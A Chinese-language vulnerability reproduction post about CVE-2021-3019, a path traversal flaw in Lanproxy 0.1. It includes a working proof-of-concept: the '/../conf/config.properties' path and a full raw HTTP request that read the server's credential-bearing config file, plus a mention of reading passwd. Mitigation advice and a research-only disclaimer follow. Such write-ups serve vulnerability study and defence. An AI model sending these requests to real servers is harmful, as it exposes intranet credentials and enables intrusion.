Lanproxy 路径遍历漏洞 (CVE-2021-3019)
Lanproxy 路径遍历漏洞 (CVE-2021-3019)
一、漏洞简介
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
二、影响版本
lanproxy 0.1
三、漏洞复现
环境安装移步:
https://www.jianshu.com/p/6482ac354d34
Poc:/../conf/config.properties
GET/../conf/config.propertiesHTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close
读取passwd
curl访问也行
四、安全建议
升级版本,和防火墙做相关路径../跳跃限制。
参考:
https://mp.weixin.qq.com/s/t8Nn3Nb4-cXh-2IfCA6mzw
https://www.cnblogs.com/limanman233/p/14239071.html
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
Lanproxy 路径遍历漏洞 (CVE-2021-3019)相关推荐
- 风炫安全Web安全学习第四十三节课 路径遍历漏洞
风炫安全Web安全学习第四十三节课 路径遍历漏洞 路径遍历 0x01 漏洞概述 路径遍历攻击(也称作目录遍历)的目标是访问web根目录外存储的文件和目录.通过操纵使用"点-斜线(-/)&qu ...
- 浅析路径遍历漏洞 文/饭
许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名,形如:http://www.nuanyue.com/getfile=image.jgp 当服务器处理传送过来 ...
- CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Apache Flink 上传路径遍历漏洞复现 一.漏洞描述 Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文 ...
- Fortinet FortiOS路径遍历漏洞 CVE-2018-13379
Fortinet FortiOS路径遍历漏洞 CVE-2018-13379 一.漏洞介绍 Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上 ...
- java 路径遍历 漏洞修复
private static Pattern FilePattern = Pattern.compile("[\\\\/:*?\"<>|]"); /*** 路 ...
- linux系统sip网络电话,Yealink网络电话SIP-T38G绝对路径遍历漏洞
发布日期:2014-08-03 更新日期:2014-08-11 受影响系统: yealink SIP-T38G 描述: ---------------------------------------- ...
- citrix 路径遍历 rce漏洞(CVE-2019-19781)
漏洞描述 Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令.根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Cit ...
- Citrix路径遍历(CVE-2019-19781)
漏洞描述 Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令.根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Cit ...
- CVE-2021-42013:Apache HTTP Server目录遍历漏洞
前言 漏洞原理 该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件 ...
最新文章
- 大学计算机专业选哪个,这么多大学都有计算机专业 究竟选哪个好呢?
- NFS、SSH、SAMBA
- misc高阶 攻防世界_玄幻世界(修真、仙侠、奇幻、神话)修炼体系基础模型设定。...
- java类的命名规范_浅谈Java中的命名规范
- 不要在nodejs中阻塞event loop
- 已拦截跨源请求:同源策略禁止读取位于XXXXXXXXXXXXXXXX/demo_test.txt 的远程资源。(原因:CORS 请求不是 http)
- 3.9 对称三位素数
- 前端学习(1509):单页应用SPA特点
- Resources$NotFoundException
- 账户体系、支付服务设计第一版
- Oracle.start with … connect by [… and] prior…order siblings by …
- python提取cad坐标_从CAD图里提取坐标的方法
- CC2530单片机开发--串口
- VUE项目引入公共样式的styl文件
- php 格式化金额(每三位加一逗号)
- 苹果手机怎么在照片上添加文字_用手机修图软件,给照片添加精美的文字排版,如何操作最简单?...
- 利用snmp oid获取交换机型号版本
- android 仿微信demo————微信消息界面实现(移动端)
- 小米air2se耳机只有一边有声音怎么办_盘点2020半入耳蓝牙耳机排名
- java毕业生设计在线辅导答疑系统计算机源码+系统+mysql+调试部署+lw
热门文章
- 节点表征学习与节点预测和边预测
- Python数据分析入门笔记10——简单案例练习(学生信息分析)
- landsat8 编辑头文件信息
- 微信小程序之小程序审核
- 英语语言学论文选题 计算机,88个英语语言学、语言论文题目选题参考
- Linux被熊孩子攻破了?
- pytorch中view()和flatten
- 报错解决:Reason: Failed to determine a suitable driver class
- 小几届的学弟问我,软件测试岗是选11k的华为还是20k的小公司,我直呼受不了,太凡尔赛了
- 中华活页文选杂志中华活页文选杂志社中华活页文选编辑部2022年第8期目录